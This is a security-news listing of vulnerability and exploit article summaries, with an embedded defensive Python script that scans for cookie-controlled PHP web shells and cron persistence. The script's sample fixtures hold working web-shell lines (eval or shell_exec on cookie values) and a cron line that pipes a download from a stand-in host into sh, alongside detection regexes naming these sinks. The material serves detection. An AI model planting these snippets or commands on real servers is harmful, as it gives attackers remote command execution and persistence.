Vulnerabilities
748 articles on vulnerability disclosures and exploits
FortiClient EMS RCE via CVE-2026-35616 — Mitigation Guide
Fortinet releases emergency patches for CVE-2026-35616, a critical SQL injection flaw in FortiClient EMS exploited to achieve unauthenticated RCE.
CVE-2025-55182: Hackers Exploit React2Shell in Next.js Applications
Security researchers observe automated credential theft campaigns exploiting the React2Shell vulnerability (CVE-2025-55182) in vulnerable Next.js applications.

CVE-2026-35616: Critical FortiClient EMS API Bypass Exploited
Fortinet releases out-of-band patches for CVE-2026-35616, a critical API access bypass in FortiClient EMS enabling unauthenticated privilege escalation.

36 Malicious npm Packages Target Strapi, Redis, and PostgreSQL
36 malicious npm packages disguised as Strapi CMS plugins target Redis and PostgreSQL environments to deploy persistent implants and reverse shells.
Community-Driven Intel: Managing Unstructured Vulnerability Data
Examine how security practitioners use open intelligence forums to identify emerging threats and the technical challenges of processing unstructured data.

Apple Patches DarkSword for iOS 18 — Security Analysis
Apple breaks precedent by patching the vulnerabilities exploited by the DarkSword mobile exploitation framework on iOS 18, addressing critical kernel-level and RCE flaws.

Cookie-Controlled PHP Web Shells Evade Detection on Linux Servers
Microsoft researchers warn of stealthy PHP web shells on Linux using HTTP cookies for command execution and cron jobs for long-term persistence.
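The cookie-driven web shell and cron persistence pattern summarized above lends itself to a quick triage scan. The Python below is an added example written for this page, not code from Microsoft's report or from this site: the PHP snippets and crontab lines it scans are constructed samples, and the sink list and regular expressions are the editor's own heuristics (assumptions, not a complete taint analysis). It flags PHP files where a value read from $_COOKIE reaches a command-execution or eval sink, directly or through one intermediate variable, and then flags cron entries that run one of those files or pipe a download into a shell.

```python
import re

# Constructed sample PHP sources keyed by path (assumed layout, not real samples).
SAMPLE_PHP_FILES = {
    "/var/www/html/wp-content/uploads/cache.php":
        "<?php if(isset($_COOKIE['x'])){ @eval(base64_decode($_COOKIE['x'])); } ?>",
    "/var/www/html/inc/helper.php":
        "<?php $c = $_COOKIE['cmd'];\n$out = shell_exec($c);\necho $out; ?>",
    "/var/www/html/user.php":
        "<?php $lang = $_COOKIE['lang'] ?? 'en'; echo htmlspecialchars($lang); ?>",
    "/var/www/html/index.php":
        "<?php echo 'hello'; ?>",
}

# Constructed crontab content (system crontab format: schedule, user, command).
SAMPLE_CRONTAB = """\
0 3 * * * root /usr/bin/certbot renew --quiet
*/5 * * * * www-data /usr/bin/php /var/www/html/wp-content/uploads/cache.php
@reboot www-data curl -s http://198.51.100.7/x.sh | sh
"""

# Functions that turn attacker-controlled strings into code or commands (heuristic list).
SINKS = r"\b(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\("
COOKIE_REF = r"\$_COOKIE\s*\["
# "$var = ... $_COOKIE[...]" within one statement; "(?!=)" skips "==" comparisons.
ASSIGN_FROM_COOKIE = r"(\$[A-Za-z_]\w*)\s*=(?!=)\s*[^;]*\$_COOKIE\s*\["
# "curl ... | sh" / "wget ... | bash" style download-and-execute.
PIPE_TO_SHELL = r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b"


def find_cookie_to_sink(src):
    """Return [(kind, evidence)] for cookie values reaching a sink in one PHP source."""
    findings = []
    # Direct: $_COOKIE[...] appears inside the sink's argument list (same statement).
    for m in re.finditer(SINKS + r"[^;]*" + COOKIE_REF, src):
        findings.append(("direct", m.group(0).strip()))
    # Indirect: $var is assigned from $_COOKIE and later used inside a sink call.
    for m in re.finditer(ASSIGN_FROM_COOKIE, src):
        var = m.group(1)
        if re.search(SINKS + r"[^;]*" + re.escape(var) + r"\b", src[m.end():]):
            findings.append(("indirect", var))
    return findings


def scan_php(files):
    """Map path -> findings, keeping only files with at least one finding."""
    return {p: f for p, src in files.items() if (f := find_cookie_to_sink(src))}


def scan_crontab(text, suspicious_paths):
    """Return cron lines that run a flagged file or pipe a download into a shell."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if any(p in line for p in suspicious_paths) or re.search(PIPE_TO_SHELL, line):
            hits.append(line)
    return hits


if __name__ == "__main__":
    shells = scan_php(SAMPLE_PHP_FILES)
    for path, findings in shells.items():
        print(f"[web shell candidate] {path}: {findings}")
    for line in scan_crontab(SAMPLE_CRONTAB, shells.keys()):
        print(f"[cron persistence candidate] {line}")
```

To use this on a real host, replace SAMPLE_PHP_FILES with a walk over the web root and SAMPLE_CRONTAB with the contents of /etc/crontab, /etc/cron.d/* and each user's crontab. Treat a hit as a lead for manual review rather than a verdict: the regexes catch the plain pattern described in the report, but string concatenation, variable function names, or a cookie decoded in a separate include will evade them, and a legitimate file that echoes a cookie (as user.php does here) is correctly left alone.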
TrueConf Zero-Day: Exploitation Against Asian Governments
A Chinese threat actor is actively exploiting a TrueConf video conferencing zero-day to conduct reconnaissance and achieve privilege escalation against Asian government
Shadow AI & Zero-Click Exploits Expand Enterprise Mobile Attack Surface
Enterprises face a growing mobile attack surface from shadow AI in apps, outdated devices, and zero-click exploits, leading to unseen risks for corporate data.
CVE-2023-24489: Citrix ShareFile StorageZones Controller Unauthenticated RCE
Critical unauthenticated RCE in Citrix ShareFile StorageZones Controller (CVE-2023-24489) enables arbitrary file upload and full system compromise. Patch immediately.
Ivanti Connect Secure RCE: Internal Network Vulnerability Detection
Analyze the impact of the Ivanti Connect Secure vulnerabilities and learn how to scan the internal network for affected Ivanti appliances.
Yokogawa CENTUM VP CVE-2025-7741 Hardcoded Password Patch Guidance
CISA identifies a hardcoded password in Yokogawa CENTUM VP (CVE-2025-7741). Learn how to secure the PROG account and apply the R7.01.10 patch now.